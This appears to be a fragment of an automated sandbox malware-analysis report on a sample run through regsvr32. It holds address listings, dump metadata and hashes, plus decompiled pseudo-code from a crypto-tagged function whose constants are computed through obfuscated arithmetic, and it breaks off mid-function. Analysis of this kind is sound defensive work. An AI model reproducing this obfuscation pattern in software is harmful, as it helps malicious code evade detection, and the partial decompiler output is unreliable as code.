                                                                                                                0x001aeea3
                                                                                                                0x001aeeae
                                                                                                                0x001aeeb6
                                                                                                                0x001aeec1
                                                                                                                0x001aeecc
                                                                                                                0x001aeedf
                                                                                                                0x001aeee6
                                                                                                                0x001aeef1
                                                                                                                0x001aef04
                                                                                                                0x001aef0b
                                                                                                                0x001aef16
                                                                                                                0x001aef21
                                                                                                                0x001aef35
                                                                                                                0x001aef3c
                                                                                                                0x001aef44
                                                                                                                0x001aef4f
                                                                                                                0x001aef5a
                                                                                                                0x001aef65
                                                                                                                0x001aef78
                                                                                                                0x001aef7f
                                                                                                                0x001aef8a
                                                                                                                0x001aef95
                                                                                                                0x001aefa2
                                                                                                                0x001aefa9
                                                                                                                0x001aefb4
                                                                                                                0x001aefc8
                                                                                                                0x001aefcd
                                                                                                                0x001aefd6
                                                                                                                0x001aefe1
                                                                                                                0x001aefec
                                                                                                                0x001aeff4
                                                                                                                0x001aeff9
                                                                                                                0x001aeffe
                                                                                                                0x001af006
                                                                                                                0x001af00e
                                                                                                                0x001af016
                                                                                                                0x001af020
                                                                                                                0x001af023
                                                                                                                0x001af026
                                                                                                                0x001af032
                                                                                                                0x001af036
                                                                                                                0x001af03e
                                                                                                                0x001af054
                                                                                                                0x001af05b
                                                                                                                0x001af066
                                                                                                                0x001af071
                                                                                                                0x001af079
                                                                                                                0x001af081
                                                                                                                0x001af089
                                                                                                                0x001af091
                                                                                                                0x001af099
                                                                                                                0x001af0a4
                                                                                                                0x001af0af
                                                                                                                0x001af0ba
                                                                                                                0x001af0cc
                                                                                                                0x001af0d1
                                                                                                                0x001af0da
                                                                                                                0x001af0e5
                                                                                                                0x001af0ed
                                                                                                                0x001af0f2
                                                                                                                0x001af0fe
                                                                                                                0x001af103
                                                                                                                0x001af109
                                                                                                                0x001af111
                                                                                                                0x001af119
                                                                                                                0x001af121
                                                                                                                0x001af129
                                                                                                                0x001af131
                                                                                                                0x001af139
                                                                                                                0x001af145
                                                                                                                0x001af14a
                                                                                                                0x001af150
                                                                                                                0x001af158
                                                                                                                0x001af15b
                                                                                                                0x001af161
                                                                                                                0x001af169
                                                                                                                0x001af174
                                                                                                                0x001af188
                                                                                                                0x001af18d
                                                                                                                0x001af196
                                                                                                                0x001af1a1
                                                                                                                0x001af1ac
                                                                                                                0x001af1b4
                                                                                                                0x001af1bf
                                                                                                                0x001af1ca
                                                                                                                0x001af1d5
                                                                                                                0x001af1e2
                                                                                                                0x001af1e5
                                                                                                                0x001af1f1
                                                                                                                0x001af1f5
                                                                                                                0x001af1fa
                                                                                                                0x001af202
                                                                                                                0x001af20a
                                                                                                                0x001af20f
                                                                                                                0x001af217
                                                                                                                0x001af21c
                                                                                                                0x001af224
                                                                                                                0x001af22f
                                                                                                                0x001af23a
                                                                                                                0x001af245
                                                                                                                0x001af250
                                                                                                                0x001af25b
                                                                                                                0x001af266
                                                                                                                0x001af271
                                                                                                                0x001af279
                                                                                                                0x001af27e
                                                                                                                0x001af283
                                                                                                                0x001af288
                                                                                                                0x001af290
                                                                                                                0x001af29b
                                                                                                                0x001af2a2
                                                                                                                0x001af2ad
                                                                                                                0x001af2b9
                                                                                                                0x001af2bc
                                                                                                                0x001af2c0
                                                                                                                0x001af2c9
                                                                                                                0x001af2cd
                                                                                                                0x001af2d5
                                                                                                                0x001af2dd
                                                                                                                0x001af2e2
                                                                                                                0x001af2e7
                                                                                                                0x001af2ef
                                                                                                                0x001af2f7
                                                                                                                0x001af302
                                                                                                                0x001af30a
                                                                                                                0x001af312
                                                                                                                0x001af31a
                                                                                                                0x001af325
                                                                                                                0x001af32d
                                                                                                                0x001af335
                                                                                                                0x001af33d
                                                                                                                0x001af345
                                                                                                                0x001af34d
                                                                                                                0x001af355
                                                                                                                0x001af35d
                                                                                                                0x001af367
                                                                                                                0x001af36b
                                                                                                                0x001af373
                                                                                                                0x001af386
                                                                                                                0x001af38f
                                                                                                                0x001af39a
                                                                                                                0x001af3a5
                                                                                                                0x001af3ba
                                                                                                                0x001af3bd
                                                                                                                0x001af3cf
                                                                                                                0x001af3d6
                                                                                                                0x001af3e1
                                                                                                                0x001af3ec
                                                                                                                0x001af3f4
                                                                                                                0x001af3ff
                                                                                                                0x001af40a
                                                                                                                0x001af412
                                                                                                                0x001af41a
                                                                                                                0x001af422
                                                                                                                0x001af42a
                                                                                                                0x001af432
                                                                                                                0x001af43d
                                                                                                                0x001af44f
                                                                                                                0x001af454
                                                                                                                0x001af45d
                                                                                                                0x001af468
                                                                                                                0x001af470
                                                                                                                0x001af475
                                                                                                                0x001af47d
                                                                                                                0x001af482
                                                                                                                0x001af48a
                                                                                                                0x001af495
                                                                                                                0x001af49d
                                                                                                                0x001af4a8
                                                                                                                0x001af4ba
                                                                                                                0x001af4bf
                                                                                                                0x001af4c8
                                                                                                                0x001af4d3
                                                                                                                0x001af4de
                                                                                                                0x001af4e9
                                                                                                                0x001af4f4
                                                                                                                0x001af4ff
                                                                                                                0x001af50a
                                                                                                                0x001af512
                                                                                                                0x001af51d
                                                                                                                0x001af530
                                                                                                                0x001af531
                                                                                                                0x001af538
                                                                                                                0x001af543
                                                                                                                0x001af54e
                                                                                                                0x001af562
                                                                                                                0x001af569
                                                                                                                0x001af574
                                                                                                                0x001af57c
                                                                                                                0x001af584
                                                                                                                0x001af58c
                                                                                                                0x001af594
                                                                                                                0x001af59c
                                                                                                                0x001af5a7
                                                                                                                0x001af5af
                                                                                                                0x001af5ba
                                                                                                                0x001af5c2
                                                                                                                0x001af5cf
                                                                                                                0x001af5d3
                                                                                                                0x001af5d7
                                                                                                                0x001af5df
                                                                                                                0x001af5e9
                                                                                                                0x001af5ee
                                                                                                                0x001af5f6
                                                                                                                0x001af5fb
                                                                                                                0x001af603
                                                                                                                0x001af60b
                                                                                                                0x001af610
                                                                                                                0x001af61b
                                                                                                                0x001af620
                                                                                                                0x001af624
                                                                                                                0x001af62c
                                                                                                                0x001af641
                                                                                                                0x001af642
                                                                                                                0x001af649
                                                                                                                0x001af654
                                                                                                                0x001af65c
                                                                                                                0x001af664
                                                                                                                0x001af66c
                                                                                                                0x001af671
                                                                                                                0x001af679
                                                                                                                0x001af689
                                                                                                                0x001af68d
                                                                                                                0x001af695
                                                                                                                0x001af69d
                                                                                                                0x001af6a5
                                                                                                                0x001af6b8
                                                                                                                0x001af6bf
                                                                                                                0x001af6ca
                                                                                                                0x001af6d5
                                                                                                                0x001af6e0
                                                                                                                0x001af6eb
                                                                                                                0x001af6f6
                                                                                                                0x001af701
                                                                                                                0x001af70c
                                                                                                                0x001af720
                                                                                                                0x001af727
                                                                                                                0x001af732
                                                                                                                0x001af73d
                                                                                                                0x001af748
                                                                                                                0x001af753
                                                                                                                0x001af75e
                                                                                                                0x001af769
                                                                                                                0x001af774
                                                                                                                0x001af787
                                                                                                                0x001af78e
                                                                                                                0x001af799
                                                                                                                0x001af7a1
                                                                                                                0x001af7a9
                                                                                                                0x001af7b1
                                                                                                                0x001af7bc
                                                                                                                0x001af7c4
                                                                                                                0x001af7cf
                                                                                                                0x001af7da
                                                                                                                0x001af7ed
                                                                                                                0x001af7f4
                                                                                                                0x001af7ff
                                                                                                                0x001af80a
                                                                                                                0x001af812
                                                                                                                0x001af81d
                                                                                                                0x001af828
                                                                                                                0x001af83b
                                                                                                                0x001af842
                                                                                                                0x001af84d
                                                                                                                0x001af858
                                                                                                                0x001af863
                                                                                                                0x001af870
                                                                                                                0x001af878
                                                                                                                0x001af884
                                                                                                                0x001af887
                                                                                                                0x001af890
                                                                                                                0x001af894
                                                                                                                0x001af89c
                                                                                                                0x001af8a7
                                                                                                                0x001af8b2
                                                                                                                0x001af8bd
                                                                                                                0x001af8c8
                                                                                                                0x001af8d3
                                                                                                                0x001af8de
                                                                                                                0x001af8f1
                                                                                                                0x001af8f8
                                                                                                                0x001af903
                                                                                                                0x001af90e
                                                                                                                0x001af919
                                                                                                                0x001af921
                                                                                                                0x001af92c
                                                                                                                0x001af942
                                                                                                                0x001af949
                                                                                                                0x001af951
                                                                                                                0x001af95c
                                                                                                                0x001af967
                                                                                                                0x001af972
                                                                                                                0x001af97a
                                                                                                                0x001af985
                                                                                                                0x001af990
                                                                                                                0x001af99c
                                                                                                                0x001af99f
                                                                                                                0x001af9a3
                                                                                                                0x001af9ab
                                                                                                                0x001af9b3
                                                                                                                0x001af9bb
                                                                                                                0x001af9c6
                                                                                                                0x001af9ce
                                                                                                                0x001af9d9
                                                                                                                0x001af9e4
                                                                                                                0x001af9ef
                                                                                                                0x001af9fa
                                                                                                                0x001afa02
                                                                                                                0x001afa0a
                                                                                                                0x001afa15
                                                                                                                0x001afa20
                                                                                                                0x001afa28
                                                                                                                0x001afa33
                                                                                                                0x001afa3e
                                                                                                                0x001afa49
                                                                                                                0x001afa54
                                                                                                                0x001afa5f
                                                                                                                0x001afa6a
                                                                                                                0x001afa75
                                                                                                                0x001afa80
                                                                                                                0x001afa8b
                                                                                                                0x001afa96
                                                                                                                0x001afaa1
                                                                                                                0x001afaa9
                                                                                                                0x001afab1
                                                                                                                0x001afabc
                                                                                                                0x001afac7
                                                                                                                0x001afad2
                                                                                                                0x001afadd
                                                                                                                0x001afae8
                                                                                                                0x001afaf3
                                                                                                                0x001afb06
                                                                                                                0x001afb0d
                                                                                                                0x001afb18
                                                                                                                0x001afb23
                                                                                                                0x001afb2e
                                                                                                                0x001afb33
                                                                                                                0x001afb3e
                                                                                                                0x001afb43
                                                                                                                0x001afb4e
                                                                                                                0x001afb59
                                                                                                                0x001afb64
                                                                                                                0x001afb6f
                                                                                                                0x001afb82
                                                                                                                0x001afb89
                                                                                                                0x001afb94
                                                                                                                0x001afb9f
                                                                                                                0x001afbaa
                                                                                                                0x001afbb2
                                                                                                                0x001afbba
                                                                                                                0x001afbc5
                                                                                                                0x001afbd8
                                                                                                                0x001afbdf
                                                                                                                0x001afbea
                                                                                                                0x001afbf5
                                                                                                                0x001afc00
                                                                                                                0x001afc08
                                                                                                                0x001afc13
                                                                                                                0x001afc1e
                                                                                                                0x001afc29
                                                                                                                0x001afc34
                                                                                                                0x001afc3f
                                                                                                                0x001afc4a
                                                                                                                0x001afc55
                                                                                                                0x001afc60
                                                                                                                0x001afc68
                                                                                                                0x001afc73
                                                                                                                0x001afc7e
                                                                                                                0x001afc89
                                                                                                                0x001afc94
                                                                                                                0x001afc94
                                                                                                                0x001afc94
                                                                                                                0x001afc99
                                                                                                                0x001afc9e
                                                                                                                0x001afca3
                                                                                                                0x001afca3
                                                                                                                0x001afca3
                                                                                                                0x001afca5
                                                                                                                0x001b0103
                                                                                                                0x001b0109
                                                                                                                0x001b0139
                                                                                                                0x00000000
                                                                                                                0x001b010b
                                                                                                                0x001b010b
                                                                                                                0x001b010d
                                                                                                                0x001b016f
                                                                                                                0x001b010f
                                                                                                                0x001b010f
                                                                                                                0x001b0115
                                                                                                                0x00000000
                                                                                                                0x001b0117
                                                                                                                0x001b0117
                                                                                                                0x001b012c
                                                                                                                0x001b0132
                                                                                                                0x00000000
                                                                                                                0x001b0132
                                                                                                                0x001b0115
                                                                                                                0x001b010d
                                                                                                                0x001afcab
                                                                                                                0x001afcab
                                                                                                                0x001afffa
                                                                                                                0x001b0001
                                                                                                                0x001b0006
                                                                                                                0x001b0020
                                                                                                                0x001b0029
                                                                                                                0x001b0037
                                                                                                                0x001b004c
                                                                                                                0x001b0071
                                                                                                                0x001b0097
                                                                                                                0x001b009d
                                                                                                                0x001b00aa
                                                                                                                0x001b00af
                                                                                                                0x001b00b2
                                                                                                                0x001b00b9
                                                                                                                0x001b00c2
                                                                                                                0x001b00bb
                                                                                                                0x001b00bd
                                                                                                                0x001b00bf
                                                                                                                0x001b00bf
                                                                                                                0x001b00e5
                                                                                                                0x001b00ea
                                                                                                                0x00000000
                                                                                                                0x001afcb1
                                                                                                                0x001afcb3
                                                                                                                0x001aff4d
                                                                                                                0x001aff54
                                                                                                                0x001aff59
                                                                                                                0x001aff6e
                                                                                                                0x001affac
                                                                                                                0x001affc5
                                                                                                                0x001affdc
                                                                                                                0x001affed
                                                                                                                0x001afff2
                                                                                                                0x00000000
                                                                                                                0x001afcb9
                                                                                                                0x001afcbb
                                                                                                                0x001aff26
                                                                                                                0x001aff2b
                                                                                                                0x001aff35
                                                                                                                0x001aff37
                                                                                                                0x001aff3a
                                                                                                                0x001aff3f
                                                                                                                0x001aff43
                                                                                                                0x001aff46
                                                                                                                0x001afc94
                                                                                                                0x001afc94
                                                                                                                0x001afc94
                                                                                                                0x001afc99
                                                                                                                0x001afc9e
                                                                                                                0x00000000
                                                                                                                0x001afc9e
                                                                                                                0x001afcc1
                                                                                                                0x001afcc3
                                                                                                                0x001afdb1
                                                                                                                0x001afdb8
                                                                                                                0x001afdbd
                                                                                                                0x001afdcc
                                                                                                                0x001afdd1
                                                                                                                0x001afdd8
                                                                                                                0x001afdda
                                                                                                                0x001afddf
                                                                                                                0x001afdee
                                                                                                                0x001afdfd
                                                                                                                0x001afe17
                                                                                                                0x001afe1e
                                                                                                                0x001afe26
                                                                                                                0x001afe34
                                                                                                                0x001afe3f
                                                                                                                0x001afe4d
                                                                                                                0x001afe54
                                                                                                                0x001afe5c
                                                                                                                0x001afec4
                                                                                                                0x001afed1
                                                                                                                0x001afee3
                                                                                                                0x001afefd
                                                                                                                0x001aff02
                                                                                                                0x00000000
                                                                                                                0x001afcc9
                                                                                                                0x001afcc9
                                                                                                                0x001afccf
                                                                                                                0x001afcd5
                                                                                                                0x001afcdc
                                                                                                                0x001afce1
                                                                                                                0x001afcf6
                                                                                                                0x001afcfb
                                                                                                                0x001afd01
                                                                                                                0x001afd06
                                                                                                                0x001afd47
                                                                                                                0x001afd6e
                                                                                                                0x001afd7c
                                                                                                                0x001afd9f
                                                                                                                0x001afda4
                                                                                                                0x001afda7
                                                                                                                0x001afda7
                                                                                                                0x001b00ed
                                                                                                                0x001b00ed
                                                                                                                0x001b00f2
                                                                                                                0x001b00f7
                                                                                                                0x001b00fc
                                                                                                                0x001b00fc
                                                                                                                0x001afccf
                                                                                                                0x00000000
                                                                                                                0x001afcc3
                                                                                                                0x001afcbb
                                                                                                                0x001afcb3
                                                                                                                0x001afcab
                                                                                                                0x001b0179
                                                                                                                0x001b0183
                                                                                                                0x001b013e
                                                                                                                0x001b013e
                                                                                                                0x00000000
                                                                                                                0x001b014a

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: }$$:$&F$)0$.$1L$8Z}$;Da$AE$FJ$]|$d.$n6$vOj$}$J$<s$J$}Q
                                                                                                                • API String ID: 0-2034874769
                                                                                                                • Opcode ID: fdb5ce1ecaec1105bfddf626768ba0c09d829232556f9b27d6bb6649fdadcd0f
                                                                                                                • Instruction ID: a97a9bdf50e78dbd4e6c2056853f21510f8fae84ab4d08543572258ed5705d3c
                                                                                                                • Opcode Fuzzy Hash: fdb5ce1ecaec1105bfddf626768ba0c09d829232556f9b27d6bb6649fdadcd0f
                                                                                                                • Instruction Fuzzy Hash: 58A2FE715093809FD3B9CF65C58ABCBBBE1BBC5708F10891DE1DA96260DBB18949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BBD63 Relevance: 22.0, Strings: 17, Instructions: 709COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E001BBD63(signed int __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _t830;
				intOrPtr _t831;
				void* _t845;
				signed int _t853;
				signed int _t859;
				signed int* _t861;
				signed int _t870;
				signed int _t880;
				void* _t920;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t954;
				signed int _t959;
				signed int _t960;
				signed int* _t962;
				void* _t966;

				_push(_a40);
				_v4 = __edx;
				_push(_a36);
				_t861 = _a8;
				_push(_a32);
				_v8 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_t861);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E001AC98A(__ecx & 0x0000ffff);
				_v308 = 0x1e9619;
				_t962 =  &(( &_v312)[0xc]);
				_v308 = _v308 ^ 0xdd4ab515;
				_v308 = _v308 | 0x6679f5c5;
				_v308 = _v308 ^ 0xff7df7cd;
				_t859 = 0;
				_v184 = 0x607c46;
				_t952 = 0x9cb49f1;
				_v16 = 0;
				_t22 =  &_v184; // 0x607c46
				_t938 = 0x55;
				_v184 =  *_t22 / _t938;
				_v184 = _v184 ^ 0xcc954262;
				_v184 = _v184 ^ 0xcc9460e6;
				_v56 = 0xc8af3a;
				_v56 = _v56 + 0xc41a;
				_v56 = _v56 ^ 0x00c9739c;
				_v300 = 0x95183c;
				_v300 = _v300 | 0xeef1245e;
				_v300 = _v300 + 0xffffe7c3;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x777a1220;
				_v24 = 0xedb83a;
				_v24 = _v24 ^ 0xb8133b49;
				_v24 = _v24 ^ 0xb8fec373;
				_v252 = 0x16b936;
				_v252 = _v252 ^ 0x1d43f4de;
				_v252 = _v252 >> 2;
				_v252 = _v252 + 0xfffffb4f;
				_v252 = _v252 ^ 0x07154ec9;
				_v48 = 0x4e7b66;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x0004273d;
				_v228 = 0xea44e6;
				_t66 =  &_v228; // 0xea44e6
				_t959 = 0x6a;
				_v228 =  *_t66 / _t959;
				_v228 = _v228 ^ 0x544f9d8e;
				_v228 = _v228 ^ 0x504da846;
				_v276 = 0x8f2397;
				_v276 = _v276 >> 0xb;
				_t939 = 0x1d;
				_v276 = _v276 / _t939;
				_v276 = _v276 + 0xb67d;
				_v276 = _v276 ^ 0x0008b71a;
				_v160 = 0x4aeaec;
				_v160 = _v160 << 0xb;
				_v160 = _v160 / _t959;
				_v160 = _v160 ^ 0x00d2f200;
				_v128 = 0xeb6345;
				_v128 = _v128 ^ 0x79260654;
				_v128 = _v128 | 0xd1f17a14;
				_v128 = _v128 ^ 0xf9fd7e15;
				_v168 = 0xa1c1a1;
				_t940 = 0x3c;
				_v168 = _v168 / _t940;
				_v168 = _v168 / _t959;
				_v168 = _v168 ^ 0x80000682;
				_v72 = 0xc65e02;
				_v72 = _v72 ^ 0xaea6cfa9;
				_v72 = _v72 ^ 0xae6091ab;
				_v172 = 0x2dba9f;
				_v172 = _v172 + 0x1864;
				_v172 = _v172 << 0xe;
				_v172 = _v172 ^ 0x74c0c041;
				_v280 = 0x17b6ce;
				_v280 = _v280 | 0xeeb992a2;
				_t941 = 0x53;
				_v280 = _v280 / _t941;
				_v280 = _v280 >> 0x10;
				_v280 = _v280 ^ 0x000002ff;
				_v44 = 0x1f5d8e;
				_t942 = 0x3e;
				_v44 = _v44 * 0x37;
				_v44 = _v44 ^ 0x06bd199d;
				_v292 = 0x436554;
				_v292 = _v292 + 0xffff7881;
				_v292 = _v292 + 0xffff96c3;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0x09d26003;
				_v272 = 0x168c92;
				_v272 = _v272 ^ 0x4fab9044;
				_v272 = _v272 + 0xffff3bd6;
				_v272 = _v272 ^ 0x94a5e241;
				_v272 = _v272 ^ 0xdb19bbed;
				_v304 = 0x854015;
				_v304 = _v304 << 0xd;
				_v304 = _v304 ^ 0xa80be028;
				_v308 = 0x18ebc8;
				_v308 = _v308 + 0x9245;
				_v308 = _v308 + 0xfea1;
				_v308 = _v308 ^ 0x001a3655;
				_v308 = 0x4c7939;
				_v308 = _v308 << 6;
				_v308 = _v308 | 0xd3d2cc8e;
				_v308 = _v308 ^ 0xd3d1cd34;
				_v304 = 0xe27dd7;
				_v304 = _v304 | 0xf3ccb3e7;
				_v304 = _v304 ^ 0xf3e71592;
				_v312 = 0x7b0c50;
				_v312 = _v312 / _t942;
				_v312 = _v312 * 0xe;
				_v312 = _v312 ^ 0x0f8f7a29;
				_v312 = _v312 ^ 0x0f94b085;
				_v304 = 0x43ae4b;
				_v304 = _v304 + 0xffffad53;
				_v304 = _v304 ^ 0x0042b126;
				_v308 = 0x184cdd;
				_v308 = _v308 >> 8;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 ^ 0x000c1965;
				_v312 = 0x9f4334;
				_v312 = _v312 + 0xffff91d4;
				_v312 = _v312 + 0xffff8200;
				_v312 = _v312 >> 2;
				_v312 = _v312 ^ 0x002131c8;
				_v308 = 0xec2dcd;
				_v308 = _v308 + 0xffff28bd;
				_v308 = _v308 + 0xffffa5f1;
				_v308 = _v308 ^ 0x00e869a8;
				_v312 = 0x2a368e;
				_v312 = _v312 ^ 0x76c3ccc6;
				_v312 = _v312 + 0xffff8ec2;
				_v312 = _v312 >> 0xe;
				_v312 = _v312 ^ 0x000ab56d;
				_v304 = 0x947af2;
				_v304 = _v304 | 0xa150a96c;
				_v304 = _v304 ^ 0xa1dc7ba6;
				_v312 = 0xb5bb09;
				_t943 = 0x13;
				_v312 = _v312 / _t943;
				_v312 = _v312 >> 5;
				_v312 = _v312 >> 0xd;
				_v312 = _v312 ^ 0x000700e1;
				_v304 = 0xbfe6c;
				_v304 = _v304 >> 0xb;
				_v304 = _v304 ^ 0x00036496;
				_v268 = 0x5a9706;
				_v268 = _v268 | 0x07732f5b;
				_t944 = 0x14;
				_v268 = _v268 * 3;
				_v268 = _v268 + 0xffffa7b9;
				_v268 = _v268 ^ 0x1675259e;
				_v208 = 0xd37bb6;
				_v208 = _v208 + 0xffff380a;
				_v208 = _v208 + 0xfffffbd9;
				_v208 = _v208 ^ 0x00d4cda9;
				_v40 = 0x2bdf01;
				_v40 = _v40 + 0xffff3a64;
				_v40 = _v40 ^ 0x0021cc48;
				_v80 = 0xe6d7bf;
				_v80 = _v80 + 0x2335;
				_v80 = _v80 ^ 0x00eff494;
				_v132 = 0x6017f7;
				_v132 = _v132 / _t944;
				_v132 = _v132 ^ 0x83e26fc3;
				_v132 = _v132 ^ 0x83e399cf;
				_v200 = 0x129c2;
				_v200 = _v200 ^ 0xb049febe;
				_v200 = _v200 * 0x6d;
				_v200 = _v200 ^ 0x0f0d8a63;
				_v124 = 0x72ccb;
				_v124 = _v124 << 2;
				_v124 = _v124 >> 0xb;
				_v124 = _v124 ^ 0x0005211e;
				_v244 = 0x48de31;
				_v244 = _v244 + 0x1128;
				_v244 = _v244 * 0x1d;
				_v244 = _v244 + 0xffffc180;
				_v244 = _v244 ^ 0x08410249;
				_v32 = 0xec3001;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0xd8688717;
				_v284 = 0x302c5d;
				_t333 =  &_v284; // 0x302c5d
				_v284 =  *_t333 * 0x34;
				_v284 = _v284 | 0xcc4c575a;
				_v284 = _v284 + 0x6558;
				_v284 = _v284 ^ 0xcdccc7f6;
				_v260 = 0xa2f7e6;
				_v260 = _v260 << 0xb;
				_v260 = _v260 + 0xffffb8ad;
				_t945 = 0x6b;
				_v260 = _v260 * 0x3a;
				_v260 = _v260 ^ 0x6146439e;
				_v64 = 0x960d03;
				_v64 = _v64 + 0xffffb6c5;
				_v64 = _v64 ^ 0x009b168c;
				_v108 = 0xea769d;
				_v108 = _v108 | 0x69751ae5;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 ^ 0x000a40a7;
				_v192 = 0x35da0c;
				_v192 = _v192 << 0xa;
				_v192 = _v192 + 0xffff2d3b;
				_v192 = _v192 ^ 0xd76be16a;
				_v112 = 0x63db36;
				_v112 = _v112 * 0x6c;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x02a611ef;
				_v92 = 0x702225;
				_v92 = _v92 | 0xf3fb686f;
				_v92 = _v92 / _t945;
				_v92 = _v92 ^ 0x024f3dea;
				_v100 = 0x69768;
				_v100 = _v100 >> 6;
				_v100 = _v100 + 0xca65;
				_v100 = _v100 ^ 0x000cba6f;
				_v20 = 0xcedca6;
				_v20 = _v20 << 0xc;
				_v20 = _v20 ^ 0xedc444a7;
				_v104 = 0x5e098c;
				_v104 = _v104 ^ 0x23bb05e9;
				_v104 = _v104 + 0xc8e0;
				_v104 = _v104 ^ 0x23ed8dfd;
				_v144 = 0xc26c3a;
				_v144 = _v144 + 0x6b8b;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x000b484d;
				_v120 = 0x7acab0;
				_v120 = _v120 + 0xfffffc67;
				_v120 = _v120 + 0xffffbb66;
				_v120 = _v120 ^ 0x00798dc4;
				_v76 = 0xe0c3fb;
				_v76 = _v76 ^ 0x6133999e;
				_v76 = _v76 ^ 0x61d59a93;
				_v152 = 0x94314c;
				_v152 = _v152 << 5;
				_v152 = _v152 << 8;
				_v152 = _v152 ^ 0x862dabc2;
				_v84 = 0xcdabf9;
				_v84 = _v84 + 0x544f;
				_v84 = _v84 ^ 0x00c6a3a9;
				_v180 = 0x5f41b2;
				_v180 = _v180 + 0xffff4682;
				_v180 = _v180 >> 1;
				_v180 = _v180 ^ 0x0022081f;
				_v236 = 0xf2aa39;
				_v236 = _v236 >> 9;
				_v236 = _v236 >> 8;
				_v236 = _v236 + 0x9b45;
				_v236 = _v236 ^ 0x0009958d;
				_v68 = 0xdde008;
				_v68 = _v68 + 0x4af0;
				_v68 = _v68 ^ 0x00d6a8c4;
				_v136 = 0x497b9a;
				_v136 = _v136 + 0xe5a5;
				_v136 = _v136 ^ 0x731a7a92;
				_v136 = _v136 ^ 0x735d569e;
				_v156 = 0x97046a;
				_v156 = _v156 >> 8;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x970abbc9;
				_v164 = 0x6a8d40;
				_v164 = _v164 | 0xe58a5675;
				_v164 = _v164 + 0xa73e;
				_v164 = _v164 ^ 0xe5e6b069;
				_v296 = 0xbca62e;
				_t946 = 0x69;
				_v296 = _v296 / _t946;
				_v296 = _v296 + 0xffff8af2;
				_v296 = _v296 + 0x76c0;
				_v296 = _v296 ^ 0x000403e0;
				_v60 = 0x71959b;
				_v60 = _v60 + 0xffff61df;
				_v60 = _v60 ^ 0x0072eb06;
				_v288 = 0xa400a;
				_v288 = _v288 + 0x5ee4;
				_t947 = 0x63;
				_v288 = _v288 * 0x5b;
				_v288 = _v288 * 0x1c;
				_v288 = _v288 ^ 0x69b5db4e;
				_v224 = 0x1c7aae;
				_v224 = _v224 / _t947;
				_v224 = _v224 << 4;
				_v224 = _v224 ^ 0x000bc0e5;
				_v148 = 0x1d8b31;
				_v148 = _v148 + 0xb9c7;
				_v148 = _v148 + 0xffa0;
				_v148 = _v148 ^ 0x001aef97;
				_v212 = 0x9272ad;
				_v212 = _v212 ^ 0x0fff2c78;
				_v212 = _v212 + 0xfffffd06;
				_v212 = _v212 ^ 0x0f626838;
				_v264 = 0x9fef13;
				_v264 = _v264 + 0x6337;
				_v264 = _v264 ^ 0xb03854b3;
				_v264 = _v264 + 0xfb60;
				_v264 = _v264 ^ 0xb0902fd2;
				_v304 = 0x4402ab;
				_v304 = _v304 | 0x9b5a85b4;
				_v304 = _v304 ^ 0x9b50ed56;
				_v220 = 0xbdc1e3;
				_v220 = _v220 + 0x69fa;
				_v220 = _v220 + 0xffffa833;
				_v220 = _v220 ^ 0x00b5effa;
				_v216 = 0xbb9afc;
				_v216 = _v216 << 0xd;
				_v216 = _v216 + 0xffff2452;
				_v216 = _v216 ^ 0x735287b4;
				_v36 = 0xf6688e;
				_v36 = _v36 + 0x3147;
